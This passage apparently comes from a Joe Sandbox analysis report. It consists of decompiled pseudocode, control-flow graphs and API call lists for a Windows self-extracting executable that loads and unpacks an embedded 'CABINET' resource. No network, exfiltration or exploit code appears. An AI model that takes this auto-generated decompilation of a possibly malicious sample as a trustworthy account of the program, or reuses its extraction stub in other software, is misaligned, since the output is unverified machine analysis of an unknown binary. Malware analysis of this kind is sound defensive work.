                                                                                                                                                                                                        										__eflags = _t110 - _t116;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									__eflags = _t103 + _t110 - _t116;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								if(__eflags <= 0) {
                                                                                                                                                                                                        									 *0xc9124 = 0;
                                                                                                                                                                                                        									_t66 = 1;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t66 = E000C268B(_a4, _t110, _t103,  &_v16);
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L32;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _v816 & 0x00008000;
                                                                                                                                                                                                        							if((_v816 & 0x00008000) == 0) {
                                                                                                                                                                                                        								goto L20;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t105 =  *0xc9a38; // 0x0
                                                                                                                                                                                                        							_t110 =  *((intOrPtr*)(0xc89e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0xc89e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                        							_t103 = (_t105 >> 2) +  *0xc9a38;
                                                                                                                                                                                                        							goto L21;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t110 = 0x4c5;
                                                                                                                                                                                                        						E000C44B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						goto L31;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					memset( &_v788, 0, 0x200);
                                                                                                                                                                                                        					 *0xc9124 = E000C6285();
                                                                                                                                                                                                        					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                        					_t110 = 0x4f9;
                                                                                                                                                                                                        					goto L30;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t110 = 0x4bc;
                                                                                                                                                                                                        					E000C44B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					 *0xc9124 = E000C6285();
                                                                                                                                                                                                        					_t66 = 0;
                                                                                                                                                                                                        					L33:
                                                                                                                                                                                                        					return E000C6CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}



































                                                                                                                                                                                                        0x000c597d
                                                                                                                                                                                                        0x000c5988
                                                                                                                                                                                                        0x000c598f
                                                                                                                                                                                                        0x000c599a
                                                                                                                                                                                                        0x000c59a6
                                                                                                                                                                                                        0x000c59a8
                                                                                                                                                                                                        0x000c59af
                                                                                                                                                                                                        0x000c59b9
                                                                                                                                                                                                        0x000c59dd
                                                                                                                                                                                                        0x000c59e4
                                                                                                                                                                                                        0x000c59f1
                                                                                                                                                                                                        0x000c59fe
                                                                                                                                                                                                        0x000c5a0b
                                                                                                                                                                                                        0x000c5a13
                                                                                                                                                                                                        0x000c5a19
                                                                                                                                                                                                        0x000c5a1b
                                                                                                                                                                                                        0x000c5ba1
                                                                                                                                                                                                        0x000c5baf
                                                                                                                                                                                                        0x000c5bbd
                                                                                                                                                                                                        0x000c5bd8
                                                                                                                                                                                                        0x000c5bde
                                                                                                                                                                                                        0x000c5be3
                                                                                                                                                                                                        0x000c5bec
                                                                                                                                                                                                        0x000c5bf0
                                                                                                                                                                                                        0x000c5bfc
                                                                                                                                                                                                        0x000c5c02
                                                                                                                                                                                                        0x000c5c02
                                                                                                                                                                                                        0x000c5c02
                                                                                                                                                                                                        0x000c5c04
                                                                                                                                                                                                        0x000c5c04
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5c04
                                                                                                                                                                                                        0x000c5a27
                                                                                                                                                                                                        0x000c5a3a
                                                                                                                                                                                                        0x000c5a46
                                                                                                                                                                                                        0x000c5a48
                                                                                                                                                                                                        0x000c5a4a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5a64
                                                                                                                                                                                                        0x000c5a6a
                                                                                                                                                                                                        0x000c5a6c
                                                                                                                                                                                                        0x000c5abc
                                                                                                                                                                                                        0x000c5ac2
                                                                                                                                                                                                        0x000c5ac9
                                                                                                                                                                                                        0x000c5aca
                                                                                                                                                                                                        0x000c5aca
                                                                                                                                                                                                        0x000c5acc
                                                                                                                                                                                                        0x000c5acc
                                                                                                                                                                                                        0x000c5acf
                                                                                                                                                                                                        0x000c5ad1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5ad3
                                                                                                                                                                                                        0x000c5ad6
                                                                                                                                                                                                        0x000c5ad8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5ada
                                                                                                                                                                                                        0x000c5adc
                                                                                                                                                                                                        0x000c5add
                                                                                                                                                                                                        0x000c5add
                                                                                                                                                                                                        0x000c5ae0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5ae0
                                                                                                                                                                                                        0x000c5ae2
                                                                                                                                                                                                        0x000c5ae4
                                                                                                                                                                                                        0x000c5ae6
                                                                                                                                                                                                        0x000c5ae6
                                                                                                                                                                                                        0x000c5ae6
                                                                                                                                                                                                        0x000c5ae9
                                                                                                                                                                                                        0x000c5aeb
                                                                                                                                                                                                        0x000c5af0
                                                                                                                                                                                                        0x000c5af6
                                                                                                                                                                                                        0x000c5af8
                                                                                                                                                                                                        0x000c5af9
                                                                                                                                                                                                        0x000c5af9
                                                                                                                                                                                                        0x000c5afb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5afd
                                                                                                                                                                                                        0x000c5aff
                                                                                                                                                                                                        0x000c5b00
                                                                                                                                                                                                        0x000c5b03
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5b03
                                                                                                                                                                                                        0x000c5b05
                                                                                                                                                                                                        0x000c5b08
                                                                                                                                                                                                        0x000c5b20
                                                                                                                                                                                                        0x000c5b27
                                                                                                                                                                                                        0x000c5b52
                                                                                                                                                                                                        0x000c5b52
                                                                                                                                                                                                        0x000c5b5b
                                                                                                                                                                                                        0x000c5b62
                                                                                                                                                                                                        0x000c5b6b
                                                                                                                                                                                                        0x000c5b6d
                                                                                                                                                                                                        0x000c5b76
                                                                                                                                                                                                        0x000c5b7d
                                                                                                                                                                                                        0x000c5b83
                                                                                                                                                                                                        0x000c5b7f
                                                                                                                                                                                                        0x000c5b7f
                                                                                                                                                                                                        0x000c5b7f
                                                                                                                                                                                                        0x000c5b6f
                                                                                                                                                                                                        0x000c5b72
                                                                                                                                                                                                        0x000c5b72
                                                                                                                                                                                                        0x000c5b85
                                                                                                                                                                                                        0x000c5b98
                                                                                                                                                                                                        0x000c5b9e
                                                                                                                                                                                                        0x000c5b87
                                                                                                                                                                                                        0x000c5b8f
                                                                                                                                                                                                        0x000c5b8f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5b85
                                                                                                                                                                                                        0x000c5b29
                                                                                                                                                                                                        0x000c5b33
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5b35
                                                                                                                                                                                                        0x000c5b48
                                                                                                                                                                                                        0x000c5b4a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5b4a
                                                                                                                                                                                                        0x000c5b0f
                                                                                                                                                                                                        0x000c5b16
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5b16
                                                                                                                                                                                                        0x000c5a7c
                                                                                                                                                                                                        0x000c5a8a
                                                                                                                                                                                                        0x000c5aa5
                                                                                                                                                                                                        0x000c5aab
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c59bb
                                                                                                                                                                                                        0x000c59c0
                                                                                                                                                                                                        0x000c59c7
                                                                                                                                                                                                        0x000c59d1
                                                                                                                                                                                                        0x000c59d6
                                                                                                                                                                                                        0x000c5c05
                                                                                                                                                                                                        0x000c5c14
                                                                                                                                                                                                        0x000c5c14

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 000C59A8
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNELBASE(?), ref: 000C59AF
                                                                                                                                                                                                        • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 000C5A13
                                                                                                                                                                                                        • MulDiv.KERNEL32(?,?,00000400), ref: 000C5A40
                                                                                                                                                                                                        • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 000C5A64
                                                                                                                                                                                                        • memset.MSVCRT ref: 000C5A7C
                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 000C5A98
                                                                                                                                                                                                        • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 000C5AA5
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 000C5BFC
                                                                                                                                                                                                          • Part of subcall function 000C44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 000C4518
                                                                                                                                                                                                          • Part of subcall function 000C44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 000C4554
                                                                                                                                                                                                          • Part of subcall function 000C6285: GetLastError.KERNEL32(000C5BBC), ref: 000C6285
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 4237285672-0
                                                                                                                                                                                                        • Opcode ID: 6576dfefde3bbcea94bf413b5ddba8e8bf42365277b4ee9edd5ad526ba7f2fde
                                                                                                                                                                                                        • Instruction ID: f2d625c3607ef5bf5f410298d4bcfb67e3d933360c4473e9824a21666218f924
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6576dfefde3bbcea94bf413b5ddba8e8bf42365277b4ee9edd5ad526ba7f2fde
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 477192B5A0060CAFEB659B60CC89FFF77ACFB48345F5441ADF80596181DB34AE848B61
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 374 c4fe0-c501a call c468f FindResourceA LoadResource LockResource 377 c5020-c5027 374->377 378 c5161-c5163 374->378 379 c5029-c5051 GetDlgItem ShowWindow GetDlgItem ShowWindow 377->379 380 c5057-c505e call c4efd 377->380 379->380 383 c507c-c50b4 380->383 384 c5060-c5077 call c44b9 380->384 389 c50e8-c5104 call c44b9 383->389 390 c50b6-c50da 383->390 388 c5107-c510e 384->388 391 c511d-c511f 388->391 392 c5110-c5117 FreeResource 388->392 398 c5106 389->398 390->398 402 c50dc 390->402 394 c513a-c5141 391->394 395 c5121-c5127 391->395 392->391 400 c515f 394->400 401 c5143-c514a 394->401 395->394 399 c5129-c5135 call c44b9 395->399 398->388 399->394 400->378 401->400 404 c514c-c5159 SendMessageA 401->404 405 c50e3-c50e6 402->405 404->400 405->389 405->398
                                                                                                                                                                                                        C-Code - Quality: 77%
                                                                                                                                                                                                        			E000C4FE0(void* __edi, void* __eflags) {
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* _t8;
                                                                                                                                                                                                        				struct HWND__* _t9;
                                                                                                                                                                                                        				int _t10;
                                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                                        				struct HWND__* _t24;
                                                                                                                                                                                                        				struct HWND__* _t27;
                                                                                                                                                                                                        				intOrPtr _t29;
                                                                                                                                                                                                        				void* _t33;
                                                                                                                                                                                                        				int _t34;
                                                                                                                                                                                                        				CHAR* _t36;
                                                                                                                                                                                                        				int _t37;
                                                                                                                                                                                                        				intOrPtr _t47;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t33 = __edi;
                                                                                                                                                                                                        				_t36 = "CABINET";
                                                                                                                                                                                                        				 *0xc9144 = E000C468F(_t36, 0, 0);
                                                                                                                                                                                                        				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                                                                                                                                                        				 *0xc9140 = _t8;
                                                                                                                                                                                                        				if(_t8 == 0) {
                                                                                                                                                                                                        					return _t8;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t9 =  *0xc8584; // 0x0
                                                                                                                                                                                                        				if(_t9 != 0) {
                                                                                                                                                                                                        					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                                                                                                                                                        					ShowWindow(GetDlgItem( *0xc8584, 0x841), 5); // executed
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t10 = E000C4EFD(0, 0); // executed
                                                                                                                                                                                                        				if(_t10 != 0) {
                                                                                                                                                                                                        					__imp__#20(E000C4CA0, E000C4CC0, E000C4980, E000C4A50, E000C4AD0, E000C4B60, E000C4BC0, 1, 0xc9148, _t33);
                                                                                                                                                                                                        					_t34 = _t10;
                                                                                                                                                                                                        					if(_t34 == 0) {
                                                                                                                                                                                                        						L8:
                                                                                                                                                                                                        						_t29 =  *0xc9148; // 0x0
                                                                                                                                                                                                        						_t24 =  *0xc8584; // 0x0
                                                                                                                                                                                                        						E000C44B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						_t37 = 0;
                                                                                                                                                                                                        						L9:
                                                                                                                                                                                                        						goto L10;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__imp__#22(_t34, "*MEMCAB", 0xc1140, 0, E000C4CD0, 0, 0xc9140); // executed
                                                                                                                                                                                                        					_t37 = _t10;
                                                                                                                                                                                                        					if(_t37 == 0) {
                                                                                                                                                                                                        						goto L9;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__imp__#23(_t34); // executed
                                                                                                                                                                                                        					if(_t10 != 0) {
                                                                                                                                                                                                        						goto L9;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L8;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t27 =  *0xc8584; // 0x0
                                                                                                                                                                                                        					E000C44B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					_t37 = 0;
                                                                                                                                                                                                        					L10:
                                                                                                                                                                                                        					_t12 =  *0xc9140; // 0x0
                                                                                                                                                                                                        					if(_t12 != 0) {
                                                                                                                                                                                                        						FreeResource(_t12);
                                                                                                                                                                                                        						 *0xc9140 = 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(_t37 == 0) {
                                                                                                                                                                                                        						_t47 =  *0xc91d8; // 0x0
                                                                                                                                                                                                        						if(_t47 == 0) {
                                                                                                                                                                                                        							E000C44B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(( *0xc8a38 & 0x00000001) == 0 && ( *0xc9a34 & 0x00000001) == 0) {
                                                                                                                                                                                                        						SendMessageA( *0xc8584, 0xfa1, _t37, 0);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					return _t37;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}
















                                                                                                                                                                                                        0x000c4fe0
                                                                                                                                                                                                        0x000c4fe6
                                                                                                                                                                                                        0x000c4ff9
                                                                                                                                                                                                        0x000c500d
                                                                                                                                                                                                        0x000c5013
                                                                                                                                                                                                        0x000c501a
                                                                                                                                                                                                        0x000c5163
                                                                                                                                                                                                        0x000c5163
                                                                                                                                                                                                        0x000c5020
                                                                                                                                                                                                        0x000c5027
                                                                                                                                                                                                        0x000c5037
                                                                                                                                                                                                        0x000c5051
                                                                                                                                                                                                        0x000c5051
                                                                                                                                                                                                        0x000c5057
                                                                                                                                                                                                        0x000c505e
                                                                                                                                                                                                        0x000c50a7
                                                                                                                                                                                                        0x000c50ad
                                                                                                                                                                                                        0x000c50b4
                                                                                                                                                                                                        0x000c50e8
                                                                                                                                                                                                        0x000c50e8
                                                                                                                                                                                                        0x000c50ee
                                                                                                                                                                                                        0x000c50ff
                                                                                                                                                                                                        0x000c5104
                                                                                                                                                                                                        0x000c5106
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5106
                                                                                                                                                                                                        0x000c50cd
                                                                                                                                                                                                        0x000c50d3
                                                                                                                                                                                                        0x000c50da
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c50dd
                                                                                                                                                                                                        0x000c50e6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5060
                                                                                                                                                                                                        0x000c5060
                                                                                                                                                                                                        0x000c5070
                                                                                                                                                                                                        0x000c5075
                                                                                                                                                                                                        0x000c5107
                                                                                                                                                                                                        0x000c5107
                                                                                                                                                                                                        0x000c510e
                                                                                                                                                                                                        0x000c5111
                                                                                                                                                                                                        0x000c5117
                                                                                                                                                                                                        0x000c5117
                                                                                                                                                                                                        0x000c511f
                                                                                                                                                                                                        0x000c5121
                                                                                                                                                                                                        0x000c5127
                                                                                                                                                                                                        0x000c5135
                                                                                                                                                                                                        0x000c5135
                                                                                                                                                                                                        0x000c5127
                                                                                                                                                                                                        0x000c5141
                                                                                                                                                                                                        0x000c5159
                                                                                                                                                                                                        0x000c5159
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c515f

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 000C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000C46A0
                                                                                                                                                                                                          • Part of subcall function 000C468F: SizeofResource.KERNEL32(00000000,00000000,?,000C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46A9
                                                                                                                                                                                                          • Part of subcall function 000C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000C46C3
                                                                                                                                                                                                          • Part of subcall function 000C468F: LoadResource.KERNEL32(00000000,00000000,?,000C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46CC
                                                                                                                                                                                                          • Part of subcall function 000C468F: LockResource.KERNEL32(00000000,?,000C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46D3
                                                                                                                                                                                                          • Part of subcall function 000C468F: memcpy_s.MSVCRT ref: 000C46E5
                                                                                                                                                                                                          • Part of subcall function 000C468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46EF
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 000C4FFE
                                                                                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 000C5006
                                                                                                                                                                                                        • LockResource.KERNEL32(00000000), ref: 000C500D
                                                                                                                                                                                                        • GetDlgItem.USER32(00000000,00000842), ref: 000C5030
                                                                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 000C5037
                                                                                                                                                                                                        • GetDlgItem.USER32(00000841,00000005), ref: 000C504A
                                                                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 000C5051
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 000C5111
                                                                                                                                                                                                        • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 000C5159
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                        • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                        • API String ID: 1305606123-2642027498
                                                                                                                                                                                                        • Opcode ID: e3ed7ce0eb2f9a624a25517a118bf5b7c829d19cf23ffa19177e30c76c483ae3
                                                                                                                                                                                                        • Instruction ID: 02c02aa802a1bebc54a70f4d752aaed69f91d0dd9e7249f63bf8bcb914fd5b8e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e3ed7ce0eb2f9a624a25517a118bf5b7c829d19cf23ffa19177e30c76c483ae3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8331D3B47807056FF7205B61AC9EF6F36ACF74579AF18402CBE01A61E1DABCDC808665
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 406 c44b9-c44f8 407 c44fe-c4525 LoadStringA 406->407 408 c4679-c467b 406->408 409 c4527-c452e call c681f 407->409 410 c4562-c4568 407->410 411 c467c-c468c call c6ce0 408->411 420 c453f 409->420 421 c4530-c453d call c67c9 409->421 414 c456b-c4570 410->414 414->414 415 c4572-c457c 414->415 418 c457e-c4580 415->418 419 c45c9-c45cb 415->419 422 c4583-c4588 418->422 424 c45cd-c45cf 419->424 425 c4607-c4617 LocalAlloc 419->425 426 c4544-c4554 MessageBoxA 420->426 421->420 421->426 422->422 429 c458a-c458c 422->429 431 c45d2-c45d7 424->431 427 c461d-c4628 call c1680 425->427 428 c455a-c455d 425->428 426->428 435 c462d-c463d MessageBeep call c681f 427->435 428->411 433 c458f-c4594 429->433 431->431 434 c45d9-c45ed LocalAlloc 431->434 433->433 436 c4596-c45ad LocalAlloc 433->436 434->428 437 c45f3-c4605 call c171e 434->437 444 c464e 435->444 445 c463f-c464c call c67c9 435->445 436->428 439 c45af-c45c7 call c171e 436->439 437->435 439->435 448 c4653-c4677 MessageBoxA LocalFree 444->448 445->444 445->448 448->411
                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E000C44B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v64;
                                                                                                                                                                                                        				char _v576;
                                                                                                                                                                                                        				void* _v580;
                                                                                                                                                                                                        				struct HWND__* _v584;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t34;
                                                                                                                                                                                                        				void* _t37;
                                                                                                                                                                                                        				signed int _t39;
                                                                                                                                                                                                        				intOrPtr _t43;
                                                                                                                                                                                                        				signed int _t44;
                                                                                                                                                                                                        				signed int _t49;
                                                                                                                                                                                                        				signed int _t52;
                                                                                                                                                                                                        				void* _t54;
                                                                                                                                                                                                        				intOrPtr _t55;
                                                                                                                                                                                                        				intOrPtr _t58;
                                                                                                                                                                                                        				intOrPtr _t59;
                                                                                                                                                                                                        				int _t64;
                                                                                                                                                                                                        				void* _t66;
                                                                                                                                                                                                        				intOrPtr* _t67;
                                                                                                                                                                                                        				signed int _t69;
                                                                                                                                                                                                        				intOrPtr* _t73;
                                                                                                                                                                                                        				intOrPtr* _t76;
                                                                                                                                                                                                        				intOrPtr* _t77;
                                                                                                                                                                                                        				void* _t80;
                                                                                                                                                                                                        				void* _t81;
                                                                                                                                                                                                        				void* _t82;
                                                                                                                                                                                                        				intOrPtr* _t84;
                                                                                                                                                                                                        				void* _t85;
                                                                                                                                                                                                        				signed int _t89;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t75 = __edx;
                                                                                                                                                                                                        				_t34 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        				_v8 = _t34 ^ _t89;
                                                                                                                                                                                                        				_v584 = __ecx;
                                                                                                                                                                                                        				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                                                                                                                                                        				_t67 = _a4;
                                                                                                                                                                                                        				_t69 = 0xd;
                                                                                                                                                                                                        				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                                                                                                                                                        				_t80 = _t83 + _t69 + _t69;
                                                                                                                                                                                                        				_v580 = _t37;
                                                                                                                                                                                                        				asm("movsb");
                                                                                                                                                                                                        				if(( *0xc8a38 & 0x00000001) != 0) {
                                                                                                                                                                                                        					_t39 = 1;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_v576 = 0;
                                                                                                                                                                                                        					LoadStringA( *0xc9a3c, _t75,  &_v576, 0x200);
                                                                                                                                                                                                        					if(_v576 != 0) {
                                                                                                                                                                                                        						_t73 =  &_v576;
                                                                                                                                                                                                        						_t16 = _t73 + 1; // 0x1
                                                                                                                                                                                                        						_t75 = _t16;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t43 =  *_t73;
                                                                                                                                                                                                        							_t73 = _t73 + 1;
                                                                                                                                                                                                        						} while (_t43 != 0);
                                                                                                                                                                                                        						_t84 = _v580;
                                                                                                                                                                                                        						_t74 = _t73 - _t75;
                                                                                                                                                                                                        						if(_t84 == 0) {
                                                                                                                                                                                                        							if(_t67 == 0) {
                                                                                                                                                                                                        								_t27 = _t74 + 1; // 0x2
                                                                                                                                                                                                        								_t83 = _t27;
                                                                                                                                                                                                        								_t44 = LocalAlloc(0x40, _t83);
                                                                                                                                                                                                        								_t80 = _t44;
                                                                                                                                                                                                        								if(_t80 == 0) {
                                                                                                                                                                                                        									goto L6;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t75 = _t83;
                                                                                                                                                                                                        									_t74 = _t80;
                                                                                                                                                                                                        									E000C1680(_t80, _t83,  &_v576);
                                                                                                                                                                                                        									goto L23;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t76 = _t67;
                                                                                                                                                                                                        								_t24 = _t76 + 1; // 0x1
                                                                                                                                                                                                        								_t85 = _t24;
                                                                                                                                                                                                        								do {
                                                                                                                                                                                                        									_t55 =  *_t76;
                                                                                                                                                                                                        									_t76 = _t76 + 1;
                                                                                                                                                                                                        								} while (_t55 != 0);
                                                                                                                                                                                                        								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                                                                                                                                                        								_t83 = _t25 + _t74;
                                                                                                                                                                                                        								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                                                                                                                                                        								_t80 = _t44;
                                                                                                                                                                                                        								if(_t80 == 0) {
                                                                                                                                                                                                        									goto L6;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									E000C171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                        									goto L23;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t77 = _t67;
                                                                                                                                                                                                        							_t18 = _t77 + 1; // 0x1
                                                                                                                                                                                                        							_t81 = _t18;
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								_t58 =  *_t77;
                                                                                                                                                                                                        								_t77 = _t77 + 1;
                                                                                                                                                                                                        							} while (_t58 != 0);
                                                                                                                                                                                                        							_t75 = _t77 - _t81;
                                                                                                                                                                                                        							_t82 = _t84 + 1;
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								_t59 =  *_t84;
                                                                                                                                                                                                        								_t84 = _t84 + 1;
                                                                                                                                                                                                        							} while (_t59 != 0);
                                                                                                                                                                                                        							_t21 = _t74 + 0x64; // 0x65
                                                                                                                                                                                                        							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                                                                                                                                                        							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                                                                                                                                                        							_t80 = _t44;
                                                                                                                                                                                                        							if(_t80 == 0) {
                                                                                                                                                                                                        								goto L6;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_push(_v580);
                                                                                                                                                                                                        								E000C171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                        								L23:
                                                                                                                                                                                                        								MessageBeep(_a12);
